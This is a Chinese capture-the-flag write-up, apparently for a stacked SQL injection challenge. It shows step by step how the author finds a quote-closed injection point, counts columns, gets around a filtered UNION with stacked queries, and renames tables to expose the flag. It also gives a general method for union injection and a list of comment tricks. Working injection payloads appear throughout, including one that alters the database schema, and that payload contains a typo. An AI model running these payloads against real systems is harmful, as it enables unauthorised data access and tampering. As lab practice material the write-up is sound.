首先判断sql注入,
输入1,2都有回显,输入3没有回显
输入1
输入1'
输入1'#,发现这里是单引号闭合,sql注入是字符型
接着测试字段 1' order by 1 #,到3时报错,则字段数为2
尝试联合查询注入,1' union select 1,2#,发现被过滤了
那就用堆叠注入,先尝试爆数据库,0'; show databases; #
在尝试报表,0'; show tables; #
这里发现两个表,将这两个表爆出来,
1'; show columns from words; #
0'; show columns from 1919810931114514 ; #
但是在爆破数字表名的这个表却没有回显,这里我看了别人的wp
进行以下操作:
1.将words表改名为word1或其它任意名字
2.1919810931114514改名为words
3.将新的word表插入一列,列名为id
4.将flag列改名为data
构造payload
1’;rename table words to word1;rename table 1919810931114514 to words;alter table words add id int unsigned not Null auto_increment primary key; alert table words change flag data varchar(100);#
接着我们再用1,查询就得到flag
联合查询注入流程:
1、判断有无闭合 ,1,1‘,1’#
2、猜解字段 order by 10 //采用二分法
3、判断数据回显位置 -1 union select 1,2,3,4,5.... //参数等号后面加-表示不显示当前数据
4、获取当前数据库名、用户、版本 union select version(),database(),user(),
紧接着就获取数据库名,表名及数据
堆叠注入:
目标存在sql注入漏洞
目标未对";"号进行过滤
目标中间层查询数据库信息时可同时执行多条sql语句
常见注释:
单行注释:使用"--"符号,后面的内容将被注释掉。
多行注释:使用"/* */"符号,其中的内容将被注释掉。
分段注释:可以通过在SQL语句中间添加注释符号来隐藏攻击代码,例如使用")--"或")/*"。
特殊符号注释:通过使用特殊符号来实现注释,例如在MySQL中,可以使用"#"符号来注释掉后面的内容。